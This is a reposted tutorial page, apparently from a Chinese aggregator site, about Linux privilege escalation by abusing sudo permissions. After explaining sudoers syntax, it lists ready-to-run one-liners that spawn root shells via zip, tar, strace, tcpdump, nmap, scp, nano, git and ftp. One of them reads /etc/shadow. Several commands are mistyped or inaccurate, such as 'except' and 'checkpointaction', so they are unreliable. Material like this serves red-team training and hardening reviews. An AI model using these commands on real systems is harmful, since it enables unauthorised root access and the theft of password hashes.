當前位置：首頁 > 运维知识 > linux >内容正文

linux

Abusing SUDO Advance for Linux Privilege Escalation

發(fā)布時間：2024/1/1 linux 38 豆豆

生活随笔收集整理的這篇文章主要介紹了 Abusing SUDO Advance for Linux Privilege Escalation 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

Index

What is SUDO?

Scenario.

Sudoer FIle Syntax.

Exploiting SUDO

zip
tar
strace
tcpdump
nmap
scp
except
nano & pico
git
ftp/gdb

What is SUDO ??

The SUDO(Substitute User and Do) command, allows users to delegate privileges resources proceeding activity logging. In other words, users can execute command under root ( or other users) using their own passwords?instead of root’s one or without password depending upon?sudoers?setting The rules considering the decision making about granting an access, we can find in?/etc/sudoers?file.

Scenario.

During Red Teaming, sometime we encounter some situation where in we need to escalate our privilege to root or other users. an attacker can take advantage of sudo permission to execute a shell.

Sudoer File Syntax.

root ALL=(ALL) ALL

Explain 1: The root user can execute from?ALL?terminals, acting as?ALL?(any) users, and run?ALL?(any) command.

The first part is the user, the second is the terminal from where the user can use the?sudocommand, the third part is which users he may act as, and the last one is which commands he may run when using.sudo

touhid ALL= /sbin/poweroff

Explain 2: The above command, makes the user touhid can from any terminal, run the command power off using?touhid’s user password.

touhid ALL = (root) NOPASSWD: /usr/bin/find

Explain 3:? The above command, make the user touhid can from any terminal, run the command find as?root?user?without password.

Exploiting SUDO Users.

To Exploiting sudo user u need to find which command u have to allow.
sudo?-l

The above command shows which command have allowed to the current user.

Here sudo -l, Shows the user has all this binary allowed to do as on root user without?password.

Let’s take a look at all binary one by one (which is mention in the index only) and?Escalate Privilege?to?root?user.

Using zip command

$ sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

Using tar command

$ sudo tar cf /dev/null testfile --checkpoint=1 --checkpointaction=exec=/bin/bash

Using strace command

$ sudo strace -o/dev/null /bin/bash

Using tcpdump command

$ echo $’id\ncat /etc/shadow’ > /tmp/.shell $ chmod +x /tmp/.shell $ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell-Z root

Using nmap command

$ echo "os.execute('/bin/sh')" > /tmp/shell.nse $ sudo nmap --script=/tmp/shell.nse

Using scp command

$?sudo scp -S /path/yourscript x y

Using except command

$ sudo except spawn sh then sh

Using nano command

$ sudo nano -S /bin/bash

type your command and hit CTRL+T?

Using git command

$?sudo git help status

type:? !/bin/bash

Using gdb/ftp command

$ sudo ftp

type :? !/bin/sh

總結

以上是生活随笔為你收集整理的Abusing SUDO Advance for Linux Privilege Escalation的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。